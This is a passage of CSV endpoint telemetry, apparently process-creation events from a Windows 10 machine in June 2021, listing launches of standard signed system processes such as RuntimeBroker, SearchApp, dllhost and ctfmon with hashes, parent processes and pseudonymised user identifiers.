+951,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:21.810925500+00:00,11456,StartMenuExperienceHost.exe,"""StartMenuExperienceHost.exe"" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca",PortableExecutable,2020-11-11 01:19:09.905882800+00:00,C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe,793416,6aeca53f405206cad08032b2fe2423d7,03f57900a9324df23da95a46f58245649b0357f065b7f4128e387507ce9582e6,428e60ad77f5a21b3ad8e6438e80074b09426c26,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:21.862561300+00:00,2021-06-23 00:52:50.785936+00:00,bedacc99-0c23-4622-89f9-7f88d4bae4c8,computerpii_0a470890c60768167990033d701e7bd881398861,154530,False,10.7740.19041.1052,False,11540474045136908,,11540474045171781,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,,,,,,
+952,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:21.950983400+00:00,8800,RuntimeBroker.exe,RuntimeBroker.exe -Embedding,PortableExecutable,2021-02-17 04:34:50.954376500+00:00,C:\Windows\System32\RuntimeBroker.exe,103288,ba4cfe6461afa1004c52f19c8f2169dc,e86870769ee6c797e09457bd99c58d9bf2303cf0193a24ef9b1222c2c3daf628,ab8539ef6b2a93ff9589dec4b34a0257b6296c92,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:21.974764+00:00,2021-06-23 00:52:50.786007800+00:00,364cc466-a0cf-41e2-be9f-8b5289d28d27,computerpii_0a470890c60768167990033d701e7bd881398861,154532,False,10.7740.19041.1052,False,11540474045136908,,11540474045171782,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,RuntimeBroker.exe,RuntimeBroker.exe,Runtime Broker
+953,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:22.127970900+00:00,17848,SearchApp.exe,"""SearchApp.exe"" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca",PortableExecutable,2021-06-09 01:21:18.392649+00:00,C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe,3403576,a2e28a0b40a5fb362b6b33612b76e8af,24f4282c6898dd4b85d4fafa52014362cbeff81f1ea433f2ba44717f2d6f1656,16928c207ee10878bc788a21e512df5fd6b6a826,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:22.196891400+00:00,2021-06-23 00:52:50.786042600+00:00,4ced81e5-cb71-40e8-8d70-411b7a73c481,computerpii_0a470890c60768167990033d701e7bd881398861,154533,False,10.7740.19041.1052,False,11540474045136908,,11540474045171783,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,SearchApp,SearchApp.exe,Search application
+954,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:51:22.141711+00:00,10148,RtkAudUService64.exe,"""RtkAudUService64.exe"" -admin",PortableExecutable,2021-06-11 09:11:41.196395400+00:00,C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_f31d3fd59f245137\RtkAudUService64.exe,1256824,2805aa081ca8451e6d459d246c15bce9,9e659b1f529bed5111714ec4bb4cf3c055e69240438eee7b6e88226ba3146407,0efd918c6e662d4a43c13ef133eadd4ce0ae9061,2805aa081ca8451e6d459d246c15bce9,9e659b1f529bed5111714ec4bb4cf3c055e69240438eee7b6e88226ba3146407,0efd918c6e662d4a43c13ef133eadd4ce0ae9061,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-11 09:11:42.134433900+00:00,1612,RtkAudUService64.exe,"""RtkAudUService64.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:22.202492800+00:00,2021-06-23 00:52:50.786078+00:00,87600fdd-3e2e-43c6-871b-f776b1ca6f56,computerpii_0a470890c60768167990033d701e7bd881398861,154534,False,10.7740.19041.1052,False,11540474045143160,,11540474045171784,2021-06-11 09:11:42.134433900+00:00,1612,2021-06-11 09:11:42.134433900+00:00,\Device\HarddiskVolume3\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_f31d3fd59f245137\RtkAudUService64.exe,1612,128,ActiveProcessStartkey,C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_f31d3fd59f245137,1256824,2021-03-23 10:50:48+00:00,2021-03-25 16:18:38+00:00,2021-06-11 09:11:42.153121700+00:00,2021-06-11 09:11:41.196395400+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Realtek Semiconductor,Realtek HD Audio Universal Service,1.0.370.2,RtkAudUService.exe,RtkAudUService.exe,Realtek HD Audio Universal Service,Realtek Semiconductor,Realtek HD Audio Universal Service,1.0.370.2,RtkAudUService.exe,RtkAudUService.exe,Realtek HD Audio Universal Service
+955,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 00:51:22.401883700+00:00,16948,ClipRenew.exe,ClipRenew.exe,PortableExecutable,2019-12-07 09:10:06.398428700+00:00,C:\Windows\System32\ClipRenew.exe,152080,f9c43c85cb2068df7deb1c9d58046400,f6e6f9043a1ddb2028d7960e9269e174acbb54242099b0f6160e081dfbf564ce,f4ee9279f964e7349cde354b91e2440ccc226c7f,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:22.455602500+00:00,2021-06-23 00:52:50.786470300+00:00,775ef69c-169b-41d9-b9e2-bdf979f3922c,computerpii_0a470890c60768167990033d701e7bd881398861,154545,False,10.7740.19041.1052,False,11540474045136925,,11540474045171785,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,Acquire License From Store,ClipRenew.exe,Acquire License From Store
+956,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:51:22.428531500+00:00,11416,unsecapp.exe,unsecapp.exe -Embedding,PortableExecutable,2021-03-11 01:06:22.261015700+00:00,C:\Windows\System32\wbem\unsecapp.exe,54272,febc95f4364aba305bd60d308bd722d7,0396209e22db36cf3eca0d00406f7e7d926aba6d753c1aef2dd37ddbf208d864,4a7498f74454b90412ebe3f7a4d2a7de29d5e5fe,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:22.467086100+00:00,2021-06-23 00:52:50.786541600+00:00,1bafac3a-0162-428b-906a-b5f40ed92eb6,computerpii_0a470890c60768167990033d701e7bd881398861,154547,False,10.7740.19041.1052,False,11540474045136908,,11540474045171787,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.844,unsecapp.dll,unsecapp.dll,Sink to receive asynchronous callbacks for WMI client application
+957,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:22.453505200+00:00,6784,dllhost.exe,DllHost.exe /Processid:{D4872B74-3AFC-47CD-B8A2-9E4F998539BC},PortableExecutable,2020-10-09 20:47:24.152425900+00:00,C:\Windows\System32\dllhost.exe,21312,08eb78e5be019df044c26b14703bd1fa,e7fc40b41aa8b83841a0b96d169eaf0800aa784733e636935374d56536253f10,2ce12a317bebf8293f3544433a55d972a5967996,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:22.523526400+00:00,2021-06-23 00:52:50.786576400+00:00,feccaaa3-0e56-4935-8d0c-e6919fd76a6e,computerpii_0a470890c60768167990033d701e7bd881398861,154548,False,10.7740.19041.1052,False,11540474045136908,,11540474045171788,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,dllhost.exe,dllhost.exe,COM Surrogate
+958,False,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:22.572027400+00:00,7344,ctfmon.exe,"""ctfmon.exe""",PortableExecutable,2019-12-07 09:09:00.614545300+00:00,C:\Windows\System32\ctfmon.exe,11264,b625c18e177d5beb5a6f6432ccf46fb3,484fed5f039f429ed933931ba607b7efda7d1a343d79cfab60910e1843147012,abb864e1911c59f785b0e1822701b9a5ab31ba1e,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:47:24.766622300+00:00,5244,svchost.exe,svchost.exe -k LocalSystemNetworkRestricted -p -s TabletInputService,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:23.018049500+00:00,2021-06-23 00:52:50.786963900+00:00,a8cd0f64-5e20-4961-a3fb-056849a1a9f1,computerpii_0a470890c60768167990033d701e7bd881398861,154559,False,10.7740.19041.1052,False,11540474045137061,,11540474045171789,2021-06-10 00:47:24.766622300+00:00,5244,2021-06-10 00:47:24.766622300+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,5244,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,CTFMON,CTFMON.EXE,CTF Loader
+959,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:22.841568100+00:00,12888,YourPhone.exe,"""YourPhone.exe"" -ServerName:App.AppX9yct9q388jvt4h7y0gn06smzkxcsnt8m.mca",PortableExecutable,2021-06-16 00:47:46.639551300+00:00,C:\Program Files\WindowsApps\Microsoft.YourPhone_1.21042.143.0_x64__8wekyb3d8bbwe\YourPhone.exe,24064,a6339f04b2d3b5e39e8d64bbbe3c4b1c,395769c3aadc7df7f0547fdb4956f0d785f12c14f0b22d1fe26b43333dd0d1ec,232b7bc743e2454f1afe53338395fa4efcac4989,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:23.224489200+00:00,2021-06-23 00:52:50.787032300+00:00,b0ca7cce-2148-4fd2-b371-2b1ba50ea046,computerpii_0a470890c60768167990033d701e7bd881398861,154561,False,10.7740.19041.1052,False,11540474045136908,,11540474045171790,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft Your Phone,1.21042.143.0,YourPhone.exe,YourPhone.exe,YourPhone
+960,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:23.100477600+00:00,6408,TextInputHost.exe,"""TextInputHost.exe"" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca",PortableExecutable,2021-05-12 01:12:54.242611100+00:00,C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe,18168,aabf7ef96b7c99430e0247fbb91971c1,791202d8da61bf6527eb8008dd16297da1c64cc01bedcefccb5fd4004493cacf,52ca501ee6a099600fafd092f38f434a9fbf2b49,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:23.266601400+00:00,2021-06-23 00:52:50.787068500+00:00,19440a26-d24f-45e8-a5fe-da940032011a,computerpii_0a470890c60768167990033d701e7bd881398861,154562,False,10.7740.19041.1052,False,11540474045136908,,11540474045171792,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,2001.22012.0.2020,TextInputHost.exe,TextInputHost.exe,
+961,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:25.920715200+00:00,19056,mobsync.exe,mobsync.exe -Embedding,PortableExecutable,2019-12-07 09:09:47.490502500+00:00,C:\Windows\System32\mobsync.exe,99328,5990b373978022822c91c1b997b859aa,6e83030a6a3e447acb1d38cc07035c1fd5bd2c9e136a57ce99f3ac1be45a7d3d,e65d0219e0e0c7b564d7cc71a11f145a1ee7e358,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:25.946495900+00:00,2021-06-23 00:52:50.789479800+00:00,eaadd3ec-fed3-4427-b999-d13801c81580,computerpii_0a470890c60768167990033d701e7bd881398861,154631,False,10.7740.19041.1052,False,11540474045136908,,11540474045171796,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,svchost.exe,504,256,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,mobsync.exe,mobsync.exe,Microsoft Sync Center
+962,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:26.694618900+00:00,300,dllhost.exe,DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251},PortableExecutable,2020-10-09 20:47:24.152425900+00:00,C:\Windows\System32\dllhost.exe,21312,08eb78e5be019df044c26b14703bd1fa,e7fc40b41aa8b83841a0b96d169eaf0800aa784733e636935374d56536253f10,2ce12a317bebf8293f3544433a55d972a5967996,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:26.706401600+00:00,2021-06-23 00:52:50.789620900+00:00,fda0c39e-40b5-45ac-b350-14ffec49dec9,computerpii_0a470890c60768167990033d701e7bd881398861,154635,False,10.7740.19041.1052,False,11540474045136908,,11540474045171797,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,dllhost.exe,dllhost.exe,COM Surrogate
